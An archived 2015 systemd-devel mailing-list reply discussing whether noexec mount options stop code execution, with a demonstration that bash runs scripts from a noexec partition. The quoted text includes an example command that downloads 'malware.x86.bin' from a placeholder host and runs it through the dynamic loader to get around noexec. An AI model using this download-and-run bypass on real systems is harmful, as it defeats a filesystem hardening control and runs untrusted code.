[systemd-devel] Mount options of /var/run/users/<pid>
Reindl Harald
h.reindl at thelounge.net
Mon Feb 16 11:40:00 PST 2015
Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas:
> On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
> <simon.mcvittie at collabora.co.uk <mailto:simon.mcvittie at collabora.co.uk>>
> wrote:
>
> wget http://example.com/malware.__x86.bin
> <http://example.com/malware.x86.bin>
> /lib/ld-linux.so.2 malware.x86.bin
>
>
> Pretty sure this no longer works; these days noexec prevents
> mmap(PROT_EXEC) as well
you should not assume when you can try it simple
frankly we mount most data-partitions noexec even if they contain
cronjobs which get the full interpreter and the script path by intention
[root at arrakis:~]$ mount | grep dune
/dev/sdf1 on /Volumes/dune type ext4
(rw,noexec,noatime,nodiratime,commit=30,inode_readahead_blks=16)
[root at arrakis:~]$ touch /Volumes/dune/test.sh
[root at arrakis:~]$ echo "ls /boot/" > /Volumes/dune/test.sh
[root at arrakis:~]$ bash /Volumes/dune/test.sh
config-3.18.7-100.fc20.x86_64 grub2
initramfs-3.18.7-100.fc20.x86_64.img initrd-plymouth.img lost+found
System.map-3.18.7-100.fc20.x86_64 vmlinuz-3.18.7-100.fc20.x86_64
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 181 bytes
Desc: OpenPGP digital signature
URL: <http://lists.freedesktop.org/archives/systemd-devel/attachments/20150216/e967ad0b/attachment.sig>
More information about the systemd-devel
mailing list